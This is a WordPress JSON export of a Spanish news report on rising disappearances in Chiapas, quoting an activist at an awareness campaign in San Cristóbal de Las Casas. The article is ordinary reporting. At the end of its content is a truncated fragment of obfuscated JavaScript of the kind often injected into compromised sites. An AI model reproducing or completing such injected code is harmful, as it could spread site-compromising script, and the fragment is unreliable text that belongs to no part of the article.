{"id":17592,"date":"2024-08-31T04:09:11","date_gmt":"2024-08-31T04:09:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17592"},"modified":"2024-08-31T04:09:13","modified_gmt":"2024-08-31T04:09:13","slug":"aumentan-las-desapariciones-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17592","title":{"rendered":"Aumentan las Desapariciones en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033-1024x768.jpg\" alt=\"\" class=\"wp-image-17593\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240830-WA0033.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>30 de agosto del 2024. -San Crist\u00f3bal de Las Casas.- M\u00e1s de mil desapariciones han sido registradas en Chiapas en los \u00faltimos tres a\u00f1os, cifra que sigue en aumento, seg\u00fan lo declar\u00f3 Emanuel Bran, representante de la organizaci\u00f3n &#8220;Voces Mesoamericanas&#8221; e integrante del grupo de trabajo contra las desapariciones en la entidad.<\/p>\n\n\n\n<p>Durante el inicio de la campa\u00f1a de informaci\u00f3n y sensibilizaci\u00f3n en el marco del D\u00eda de las V\u00edctimas Forzadas, llevado a cabo en el parque central de San Crist\u00f3bal de Las Casas, Bran hizo un llamado en\u00e9rgico a las autoridades.<\/p>\n\n\n\n<p>&#8220;Es innegable el &#8216;trabajo&#8217; que realiza el crimen organizado&#8221;, se\u00f1al\u00f3, subrayando la urgente necesidad de que las autoridades competentes pongan la debida atenci\u00f3n en este grave problema, evitando as\u00ed m\u00e1s desapariciones.<\/p>\n\n\n\n<p>La campa\u00f1a, que busca concienciar a la poblaci\u00f3n y visibilizar la crisis de las desapariciones, se da en un contexto de creciente violencia en el estado, donde las familias y colectivos siguen demandando justicia y la intervenci\u00f3n efectiva del gobierno para frenar esta alarmante situaci\u00f3n. Bran enfatiz\u00f3 que la respuesta de las autoridades hasta ahora ha sido insuficiente y omisa, lo que ha permitido que la problem\u00e1tica contin\u00fae en ascenso.<\/p>\n\n\n\n<p>Con esta iniciativa, &#8220;Voces Mesoamericanas&#8221; y otros colectivos esperan generar un cambio en la actitud de las autoridades y que se tomen acciones concretas para combatir la ola de desapariciones que azota a Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 30 de agosto del 2024. -San Crist\u00f3bal de Las Casas.- M\u00e1s de mil desapariciones han sido registradas en Chiapas en los \u00faltimos tres a\u00f1os, cifra que sigue en aumento, seg\u00fan lo declar\u00f3 Emanuel Bran, representante de la organizaci\u00f3n &#8220;Voces Mesoamericanas&#8221; e integrante del grupo de trabajo contra las desapariciones en la entidad. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17593,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17592","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17592"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17592\/revisions"}],"predecessor-version":[{"id":17594,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17592\/revisions\/17594"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17593"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}